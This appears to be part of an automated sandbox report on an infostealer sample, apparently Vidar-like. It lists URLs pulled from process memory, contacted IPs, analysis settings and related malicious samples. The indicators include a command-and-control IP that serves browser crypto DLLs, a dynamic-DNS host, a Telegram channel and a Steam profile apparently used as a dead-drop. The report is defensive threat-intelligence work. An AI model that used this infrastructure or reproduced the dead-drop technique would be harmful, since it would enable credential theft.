                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exeMSBuild.exe, 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiAAFBAK.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&amp;l=englishMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&amp;l=englishMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://steamcommunity.com/profiles/76561199747278259/badgesMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        https://5.75.212.60/-MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 12%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        http://arpdabl.zapto.org/iMSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=enMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://store.steampowered.com/privacMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, AAFBAK.4.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&amp;l=eMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.mozilla.com/en-US/blocklist/MSBuild.exe, MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2383501124.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.4.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://5.75.212.60/AMSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://mozilla.org0/MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://t.me/armad2afile.exe, 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        http://store.steampowered.com/privacy_agreement/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://store.steampowered.com/points/shop/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=DAECFI.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0file.exe, 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaMSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, AAFBAK.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://steamcommunity.com/?/MSBuild.exe, 00000004.00000002.2346186542.0000000001688000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016MSBuild.exe, 00000004.00000002.2351862083.0000000019EBC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmp, CBKJJE.4.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://5.75.212.60/softokn3.dllqMSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.ecosia.org/newtab/DAECFI.4.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://5.75.212.60/BMSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brCBGCAF.4.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://store.steampowered.com/privacy_agreement/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://arpdabl.HJECAAAEBFMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://5.75.212MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://arpdabl.zapto.orgMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesCBKJJE.4.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://5.75.212.60/oMSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://store.steampowered.com/about/76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://steamcommunity.com/my/wishlist/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFCBGCAF.4.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://t.me/armad2ahellosqls.dllsqlite3.dllInfile.exe, 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://5.75.212.60/nss3.dllQMSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://help.steampowered.com/en/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://steamcommunity.com/market/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://store.steampowered.com/news/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=DAECFI.4.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://store.steampowered.com/subscriber_agreement/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17MSBuild.exe, 00000004.00000002.2351862083.0000000019EBC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmp, CBKJJE.4.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://steamcommunity.com/profiles/76561199747278259/inventory/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://5.75.212.60/freebl3.dllOMSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://arpdabl.zaptoMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://steamcommunity.com/discussions/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://arpdabl.zapto.org/MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://store.steampowered.com/stats/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://store.steampowered.com/steam_refunds/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallCBKJJE.4.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchDAECFI.4.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=eZOyL2UG5OX8&aMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://arpdabl.zapto.AEBFMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://steamcommunity.com/workshop/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://store.steampowered.com/legal/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadContfile.exe, 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.sqlite.org/copyright.html.MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359740327.000000002042D000.00000002.00001000.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgMSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, AAFBAK.4.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoDAECFI.4.drfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        5.75.212.60
                        		unknownGermany
                        		24940HETZNER-ASDEfalse
                        23.192.247.89
                        		steamcommunity.comUnited States
                        		16625AKAMAI-ASUStrue

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1482751
                        Start date and time:2024-07-26 03:16:58 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 44s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:12
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@10/24@2/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 98%
                        • Number of executed functions: 118
                        • Number of non-executed functions: 180
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 13.85.23.86, 93.184.221.240, 52.165.164.15, 192.229.221.95, 13.95.31.18, 40.126.32.133, 40.126.32.68, 40.126.32.140, 20.190.160.20, 40.126.32.74, 40.126.32.136, 40.126.32.72, 40.126.32.138, 20.189.173.22
                        • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, wu.azureedge.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        21:17:58API Interceptor1x Sleep call for process: MSBuild.exe modified
                        21:18:55API Interceptor1x Sleep call for process: WerFault.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        5.75.212.60Setup .exeGet hashmaliciousGo Injector, MicroClip, Vidar, XmrigBrowse
                          23.192.247.89LisectAVT_2403002B_272.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                            35fcdf3a.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                              Setup .exeGet hashmaliciousGo Injector, MicroClip, Vidar, XmrigBrowse
                                CloudInstaller.zipGet hashmaliciousUnknownBrowse
                                  SapphireX.exeGet hashmaliciousLummaC StealerBrowse
                                    v993SRbY3C.exeGet hashmaliciousRedLineBrowse
                                      ynZemxI36h.exeGet hashmaliciousRedLineBrowse
